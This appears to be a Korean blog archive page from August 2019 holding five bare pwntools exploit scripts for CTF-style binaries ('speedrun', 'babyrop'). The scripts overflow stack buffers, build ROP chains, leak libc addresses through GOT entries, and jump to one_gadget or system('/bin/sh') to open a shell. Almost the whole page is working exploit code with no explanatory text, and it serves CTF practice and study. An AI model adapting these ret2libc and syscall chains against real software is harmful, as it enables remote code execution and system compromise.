'2019/08'에 해당되는 글 34건

exploit.py

from pwn import *

p = process("./vuln")
         
e = ELF("./vuln")
l = e.libc
        
p.sendlineafter(">>","3")
             
pr = 0x0804884b
restart = 0x80486E0

payload = "A"*(0x40+4)
payload += p32(e.plt['puts'])  
payload += p32(pr)
payload += p32(e.got['puts'])
payload += p32(restart)
    
p.sendlineafter("plz!\n",payload)
p.recvuntil("Good bye~~!\n")
puts_addr = u32(p.recv(4))
libc_base = puts_addr - l.symbols['puts']
one_gadget = [0x3d0d5,0x3d0d5,0x3d0d9,0x3d0e0,0x67a7f,0x67a80,0x137e5e,0x137e5f]
one_addr = libc_base + one_gadget[0]

payload2 = "A"*(0x40+4)
payload2 += p32(one_addr)
p.sendlineafter("plz",payload2)
p.interactive()

speedrun1_exploit.py

from pwn import *

p = process("./vuln")
e = ELF('./vuln')

syscall = 0x474e65
pop_eax = 0x415664
pop_rdi = 0x400686
pop_rsi = 0x4101f3
pop_rdx = 0x4498b5
binsh = "/bin/sh\x00"
         
payload = "A"*0x400 
payload += "B"*8
payload += p64(pop_eax) 
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(e.bss())
payload += p64(pop_rdx)
payload += p64(len(binsh))
payload += p64(syscall)



payload += p64(pop_eax)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(e.bss())
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rdx)
payload += p64(0)
payload += p64(syscall)

p.sendlineafter("words?\n",payload)
sleep(0.1)
p.send(binsh)
p.interactive()

speedrun2_exploit.py

from pwn import *

p = process("./vuln")

e = ELF('./vuln')
l = e.libc

p.sendlineafter("now?\n","Everything intelligent is so boring.")

pr = 0x4008a3
         
payload = "A"*(0x400+8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(0x40074C)
      
p.sendlineafter("more.\n",payload)
print p.recvuntil("Fascinating.\n")
puts_addr =  u64(p.recv(6).ljust(8,"\x00"))
libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + 0x10a38c

p.sendlineafter("now?\n","Everything intelligent is so boring.")

payload2 = "A"*(0x400+8)
payload2 += p64(one_addr)

print p.sendlineafter("more.\n",payload2)
sleep(0.1)
p.interactive()

bayrop1_exploit.py

from pwn import *
  
p = process("./babyrop1")

system = 0x400490
binsh = 0x601048
pr = 0x400683
ret = 0x400479

payload = "A"*(0x10+8)
payload += p64(pr)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)

p.sendlineafter("? ",payload)
p.interactive()

babyrop2_exploit.py

from pwn import *

p = process("./babyrop2")

e = ELF("./babyrop2")
l = e.libc

pr = 0x400733
ret = 0x4004d1
one_gadget = [0x4f2c5,0x4f322,0x10a38c]

payload = "A"*(0x20+8)
payload += p64(pr)
payload += p64(e.got["read"])
payload += p64(ret)
payload += p64(e.plt['printf'])
payload += p64(ret)
payload += p64(0x400636)

p.sendlineafter("? ",payload)
p.recvuntil("!\n")
read_addr =  u64(p.recv(6).ljust(8,"\x00"))
libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']
binsh = libc_base + list(l.search("/bin/sh"))[0]

payload2 = "A"*(0x20+8)
payload2 += p64(ret)
payload2 += p64(pr)
payload2 += p64(binsh)
payload2 += p64(system_addr)
p.recvuntil("? ")
p.sendline(payload2)
p.interactive()